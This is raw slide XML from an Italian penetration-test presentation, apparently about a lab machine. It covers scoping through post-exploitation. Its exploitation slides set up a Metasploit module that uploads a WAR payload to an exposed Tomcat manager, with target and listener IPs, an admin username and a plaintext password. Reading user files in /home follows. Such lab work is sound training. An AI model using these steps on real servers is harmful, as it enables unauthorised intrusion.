            <a:off x="718908" y="2803267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 sguardo agli strumenti utilizzati nelle varie fasi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B793AF34-6614-AEA2-96F9-B50AE3CFF52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629417" y="242871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Strumenti Utilizzati</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911EC704-3F17-828E-E68E-CD745D28D0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630720" y="154326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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B312B6-A920-5A54-5724-D7CF16D56138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476318" y="28033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“Scope” di cosa è stato analizzato</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4F4BB3-1CB0-3FD5-5EC6-F319DCE226E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386827" y="24288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Scoping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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B1D64F-9D4F-A16C-C85C-964D00932EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388130" y="15433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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A1E0E7-1AA4-186E-5AEF-8AEF4132AA0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238940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Recupero delle informazioni</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58708409-AA91-4FC6-7665-6A5061A16B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149449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Information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Gathering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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A43A0249-E69B-B8D4-9A81-F8DEDFC6BCE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150752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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6219FA9C-AAF6-4C2A-6056-7244FA6A71BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8993743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della macchina </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B501273F-AFF0-F8BF-F9A6-E80D23535575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8904252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Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EF3834-B6F7-56F4-C86A-B487A5C68A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905555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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5322EF44-D519-CCB9-7D23-AB6F07BB05E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719957" y="5284522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dei servizi esposti dalla macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4535016-F30C-8954-26C5-82F629890E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630466" y="490996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Enumerating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Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49380DD-6FA6-B454-5070-7426BFA0D50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631769" y="402451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3" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBB894C-1FF8-7D81-16BB-969484823587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477367" y="52846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Analisi dei problemi di sicurezza della macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB2C201-EB3D-AD5D-B471-9A67BFBAA78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3387876" y="49100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Vulnerability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Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4071A593-F62C-6F5D-6229-96CBDE5FC1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389179" y="40246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6" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974F0F60-73FF-9152-0B82-3AE630A4C40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239989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Sfruttamento delle vulnerabilità identificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A3F5AA-7955-2BD0-810C-4F774F96E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150498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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D69C5A-300A-813F-52B4-58346641FCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151801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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B8FCE1-50DE-B51C-50D9-AEAF9E6F3827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994792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Privilege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Escalation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Mantaining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Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BAFCFD-E52D-C16E-E72C-CC4CAA299C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905301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Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC0D109-E6E8-8745-A06D-F862BDE306F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906604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90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Target exploitation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Exploit</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1092880" y="1243193"/>
            <a:ext cx="9673389" cy="492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Il modulo 4 riporta:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Questo modulo può essere usato per eseguire un payload su server Apache Tomcat che hanno un’applicazione ”manager” esposta. Il payload viene caricato come archivio WAR contenente un’applicazione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> tramite una richiesta POST al componente /manager/html/upload</a:t>
            </a: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Selezioniamo tale modulo tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>use 4</a:t>
            </a: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Tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> vengono mostrati le opzioni</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pP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1ACB087-D1E1-FB34-F57D-5470ECAB5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47" y="3887916"/>
            <a:ext cx="9726506" cy="2684121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2778978375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Target exploitation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Exploit</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099653" y="1279131"/>
            <a:ext cx="9673389" cy="428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</a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>Settiamo i parametri come segue:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> 10.0.2.8		set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> 10.0.2.7	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1"/>
              <a:t>rport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> 8080		set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1"/>
              <a:t>httpusername</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1"/>
              <a:t>httppassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1"/>
              <a:t>melehifokivai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>	set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1"/>
              <a:t>FingerprintCheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> false</a:t>
            </a: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Eseguiamo il modulo</a:t>
            </a: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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6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EAC4B422-663A-252D-7F24-33F7C193D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53" y="3947598"/>
            <a:ext cx="9870758" cy="2512713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2682282316"/>
      </p:ext>
    </p:extLst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Target exploitation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Exploit</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099651" y="1826592"/>
            <a:ext cx="9673389" cy="3204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</a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Notiamo che in /home sono presenti due directory: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>jaye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>randy</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" i="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1800" dirty="0">
              <a:latin typeface="+mj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j-lt"/>
              </a:rPr>
              <a:t>Della prima non abbiamo i diritti in lettura, mentre possiamo accedere nella seconda directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pP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</p:txBody>
      </p:sp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A4C871B-0AE9-BE05-F1D0-4FA26296C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563" y="3531848"/>
            <a:ext cx="5761567" cy="2375904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589530625"/>
      </p:ext>
    </p:extLst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Target exploitation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Exploit</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099651" y="1514984"/>
            <a:ext cx="9673389" cy="3204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Ispezionando la directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>randy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> notiamo la presenza dei seguenti file: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>note.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>user.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>randombase64.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buNone/>
            </a:pP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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5" descr="Immagine che contiene testo, schermata, menu, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D4C891D-67E1-0F7D-02C7-EB3157E4B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" y="2390134"/>
            <a:ext cx="4118189" cy="2677435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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7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02463731-6A30-F486-02A5-8232A133A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893" y="3837974"/>
            <a:ext cx="7559040" cy="2722436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95C4E8A4-226B-587D-0DB8-67FD1BB3FB67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2045549" y="5197652"/>
            <a:ext cx="2221653" cy="745067"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -30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667421"/>
      </p:ext>
    </p:extLst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1A3260"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="25468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tangolo 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0A454C-8EBE-BFD1-BDE1-5AFF67ED2052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889533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2D574A72-4333-EDA4-E272-AF58B0A83CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6142669" y="3859506"/>
            <a:ext cx="2611973" cy="230096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3064F1B-4547-A3B6-A9B2-E4A016EFB1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148797" y="1360665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9DAA0B11-ADC5-7C57-6D63-115CF6E911D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895340" y="136095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2656F24F-3B3F-3B62-D95C-6128286003FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402253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74219E84-0E88-40C4-C060-721FB1639B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402254" y="134817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DD2DD3BF-1E82-13F6-8CC2-2E630E328286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630467" y="3859506"/>
            <a:ext cx="2611973" cy="2300961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4472C4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8EDEF159-E7E1-CED4-924E-33310161E37E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629418" y="1348173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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="298112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TABLE OF CONTENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC90CC3D-05EE-6228-5A5A-6E9C219BAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718908" y="2803267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Uno sguardo agli strumenti utilizzati nelle varie fasi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B793AF34-6614-AEA2-96F9-B50AE3CFF52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629417" y="242871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Strumenti Utilizzati</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
